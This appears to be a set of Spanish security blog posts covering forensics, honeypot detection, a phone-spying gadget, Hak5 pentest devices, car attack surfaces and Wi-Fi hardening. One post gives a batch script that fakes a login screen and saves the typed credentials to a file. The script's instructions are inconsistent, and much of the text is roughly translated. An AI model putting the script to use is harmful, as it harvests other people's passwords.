¿Que es el cómputo forense?

Delitos-Informaticos

Es el  proceso de aplicar técnicas científicas y analíticas a infraestructura de científicas y analíticas a infraestructura de cómputo, para identificar, preservar, analizar y presentar evidencia de manera que sea aceptable en un procedimiento legal .

Se le puede hacer cómputo forense a computadoras , PDA´s, cámaras digitales , discos duros externos , memory sticks, impresoras, celulares y consolas de videojuegos.

Los cuatro procesos para  el análisis  forense :

  1. Identificar evidencia.
  2. Preservar evidencia .
  3. Analizar evidencia .
  4. Presentar evidencia.

 

Algunos software  para el computo forense:

Hardware que debe tener un laboratorio de computo forense

  • Cables IDE .
  • Cables Ribbon .
  • Tarjetas SCSI .
  • Cables de electricidad.
  • Discos duros .
  • Al menos dos adaptadores IDE/ATA o SATA para discos duros de Notebook.
  • Forensic SATA Bridge .
  • Herramientas.

Ejemplos CD Live

Fuente del Dr. Roberto Gómez Cárdenas

Anuncios

¿Qué es una Honeypot y como detectarlas ?

 

 

Sin título

Un honeypot es un recurso que simula ser un objetivo real, el cual se espera que sea atacado o comprometido los principales objetivos son el distraer a los atacantes y obtener información sobre el ataque y el atacante.  La finalidad de las honeypots son distraer y desviar la atención del atacante, obtener información atacante  como  obtener tendencias de ataque.

Como se clasificación de honeypots  las   honeypots se clasifican de la siguiente manera.honey-pot-coloring-page-517855

  • Interacción baja , media y alta.
  • De  producción y  investigación .
  • Implementación que son honeypots físicos y honeypots Virtuales.
  • Rol que son cliente y servidor .
  • Localización rede interna y exterior (DMZ, VPS).

Algunos  puntos Principales  para  detectar una honeypot

  • Poca actividad en el sistema.
  • Credenciales demasiado débiles.
  • Sistema operativo instalado por defecto.
  • Detección de VM.
  • Ficheros y carpetas muy llamativos.

Estas  son algunas características para saber que es una honeypot y como detectarlas.

InterApp , gadget para espiar cualquier Smartphone

interapp-un-gadget-israeli-para-agencias-de-inteligencia

Se trata de InterApp, una caja negra y blanca que permite a quien la usa hacerse fácilmente con información sensible de otros usuarios como contraseñas, fotografías o todo tipo de información personal y privada que tengan almacenada en su teléfono móvil y InterApp facilita la entrada en teléfonos próximos al aparato y la única condición para traspasar su privacidad es que tengan abierto el WiFi (ni siquiera que estén conectados) y que información se pude robar la información que se pude conseguir como cuentas de correo, contraseñas de servicios y redes sociales como Twitter o Facebook, fotografías guardadas en el teléfono o subidas a plataformas como Dropbox, el IMEI del aparato, su dirección MAC, la lista de contactos o el historial del navegador.

Características de InterApp

  • Resultados rápidos
  • Capacidad para espiar cientos de móviles al mismo tiempo
  • Funciona con diferentes plataformas (iOS, Android)
  • No requiere habilidades técnicas y solo un mínimo entrenamiento
  • No deja rastro en el móvil hackeado

Recomendaciones para que no hacken  el móvil

  • Desactivar el WiFi al salir de casa.
  • No conectarse a redes wifi publicas  o que no tengan  contraseñas
  • Limitar la información personal que volcamos en las redes

Fuente de Malavida 

Las herramientas que puede ayudarte a realizar un pentesting

Estas herramientas este realizadas por equipo de  Hak5                      

 En primer lugar  USB Rubber  Ducky es la herramienta original Ataque Inyección de teclas haciéndose pasar por un genérico USB Drive es una ingenieros sociales mejor amigo la herramienta de código abierto está programado fácilmente lo que le permite entregar las pulsaciones del teclado automatizados capaces de recolección de inteligencia, la instalación de puertas traseras, exfiltrating de datos y más todo sin pasar por la mayoría de las medidas de prevención.

duck_thumb_fa2571a3-a36f-460a-b68b-d29d74d87b2f_compact

Imágenes de Hak5  

En segundo lugar WiFi piña es el punto de acceso no autorizado de oro estándar.Capaz de imitar cualquier punto de acceso, este honeypot es altamente eficaz en la recolección de los clientes vulnerables y gestionado en persona o de forma remota a través de una sencilla interfaz web, el operador está preparada de forma única como man-in-the-middle que permite la recopilación de inteligencia, la redirección de acogida, la captura de credenciales y mucho más.

1_1024x1024

Imágenes de Hak5 

En tercer lugar   la LAN de la tortuga es una herramienta de Sistemas de Administración y pruebas de penetración encubierta proporcionar acceso remoto sigilo, la recopilación de inteligencia de red y capacidades de monitoreo-man-in-the-middle. Ubicado en un caso genérico “Adaptador USB Ethernet”, aspecto encubierta de la LAN Tortuga permite que se funden en muchos entornos de TI.

lanturtle1_1024x1024 (1).png

Imágenes de HAK 5 

Y las  puedes adquiere en este  link

Fuente de  Hak5 

¿Cómo realizar un keylogger en un bloc de notas?

¿Cómo  realizar  un keylogger en un bloc de notas?

Que es un Keylogger  es un tipo de software o un dispositivo hardware específico que se encarga de registrar las pulsaciones que se realizan en el teclado, para posteriormente memorizarlas en un fichero o enviarlas a través de internet.

Vamos hacer un  keylogger básico  para ver como funciona este keylogger  para principiantes este script  utilizares con fines de  aprendizaje

Paso uno Copiamos este pequeño srcipt  en nuestro bloc de notas.

@echo off 

color a 

title Login 

cls 

echo Please Enter Email Adress And Password 

echo. 

echo. 

cd “C:\Logs” 

set /p user=Username: 

set /p pass=Password: 

echo Username=”%user%” Password=”%pass%” >> Log.txt 

start >>Program Here<< 

exit 

Paso 2. Hacer una nueva carpeta en el escritorio y el nombre de Registros ( Si la carpeta no se llama Registros, entonces no va a funcionar.)

Paso 3.  Arrastre esa carpeta en el directorio C:\

Paso 5. Muy bien, ahora una vez lo pruebas, te vas de nuevo en la carpeta de registros en el directorio C:\ y .txt archivo estará en allí, [si usted hace una segunda entrada, el .txt archivo sobrescribirá sí.

Otro ejemplo de keylogger es como el que se muestra en la imagen.

keylogger-in-notepad

¿Qué elementos son hackeables en tu Automóvil inteligente ?

 

cochehackEl progreso dele tecnología  y al seguridad es algo imparable .La nueva tendencia  en el hacking  es hacking de autos  puedes pensar que esto es algo medio zafado perno no es así cunado Intel y McAfee se ha unido para realizar un documento  de buenas “practica”que para advertir a los desarrolladores y fabricantes que extremen la precaución en el diseño de nuevas tecnologías e interfaces, evitando así que la seguridad y la privacidad tanto de los pasajeros como de los peatones sea puesta en riesgo.

¿Qué elementos son susceptibles de ataque en un coche según Intel y McAfee?

  1. La conexión con nuestro smartphone. Esa conexión esta cada día mas presente en los modelos y con ello el riesgo de un ataque aprovechando esta interfaz inalámbrica aumenta.
  2. Remote Link Type App. Aplicaciones que se encuentran instaladas en nuestro smartphone y que se “ejecutan” en el equipo de entretenimiento del coche.
  3. Airbag ECU. El hardware y la centralita que controla el funcionamiento de los airbag no solo puede estar expuesto a un ataque, sino que además es un elemento crítico en la seguridad de un coche. Imaginaros ir conduciendo y que alguien dispare los airbags a distancia…
  4. OBD II. El puerto de datos – una conexión física presente en todos los coches – de nuestro vehículo. Esta forma fue de la que los hackers atacaron el Jeep Cherokee.
  5. USB. Si, al igual que tu ordenador, tu coche lleva conexiones USB aunque nunca las hayas vistoy pueden facilitar un acceso malicioso, que como en el caso anterior requeriría un acceso físico al interior de nuestro coche.
  6. Bluetooth. Aunque no lleves el móvil conectado, a diferencia de este tu coche está “abierto” al exterior mediante el uso de una interfaz inalámbrica Bluetooth. Existe, por tanto, el riesgo de que se pueda acceder a nuestro coche rompiendo la seguridad de los protocolos empleados por la conexión Bluetooth existe.
  7. Acceso “manos libres”. Se ha demostrado que los sistemas de acceso y arranque sin llave, que nos permiten acceder al coche sin extraer la llave del bolsillo, son susceptibles a ataques. Muy posiblemente, algun familiar te haya recomendado guarda tu llave de acceso en la nevera, pues no iba tan desencaminado…
  8. Apertura remota de puertas. Hoy en día ya es posible abrir las puertas sin necesidad de una llave. El único requisito es tener un teléfono móvil, descargar una aplicación y, claro esta, las credenciales de usuario del coche que queremos abrir.
  9. TPMS. Los sensores de presión de neumáticos también emplean un protocolo de conexión inalámbrico susceptible de ser atacado.
  10. La centralita de los sistemas de iluminación, interiores y exteriores.
  11. La centralita del motor del coche y la transmisión.
  12. Los sistemas de frenado y dirección, que cada vez son más independientes – pueden hasta funcionar de manera autónoma – y dependientes de lo que sucede a nuestro alrededor – ya que ese funcionamiento autónomo se basa en las condiciones que otros sensores exteriores detectan, por ejemplo, un peatón que cruza una calle sin mirar.
  13. La centralita de acceso del coche.
  14. Otras ayudas a la conducción, como los asistentes de aparcamiento automático, o el control de crucero adaptativo.
  15. Otras ayudas a la conducción, como los asistentes de aparcamiento automático, o el control de crucero adaptativo.

Así es  como los hacker pueden hacker tu carro  todo en este mundo que tenga aseo internet es hackeable para mas información puedes escuchar el podcast de Jaime Andrés Restrepo en Infosec Táctico Episodio 11 en canal de youtube de la comunidad  DragonJAR  

Fuente de: LA RED 

 

¿Cómo podemos proteger par que no te roben la señal de interne?

M_91.UBICACIÓN: Debe dar cobertura suficiente a su empresa /hogar sin que alcance a darle cobertura vecino de la equina.
2.ACCESO FISCO: Los AP no debe estar a la mano de cualquier persona debe estar en sitios que dificulten su acceso, como cajas con cerradura, techos o falso techos.
3.Configuración Por Defecto: Debe cambiar inmediatamente la calve de    acceso al router , cambiar la ip por defecto del router, además de  actualizar el firmware para corregir cualquier problema de seguridad que    tenga .
4.Cifrado: evitar usar cifrados debeléis como WEP deshabilite WPS y utilizar WPA o WPA2 con calve fuerte.
5.HARDENING: Para dificultar un poco la tarea a un atacante, oculte el         nombre de la red realice filtrado por MAC , deshabilite el DHCP LOS SERVIOS QUE NO NECESITE DEL ROUTER después de configurar el router y recuerde de apagar el router cuando no lo use .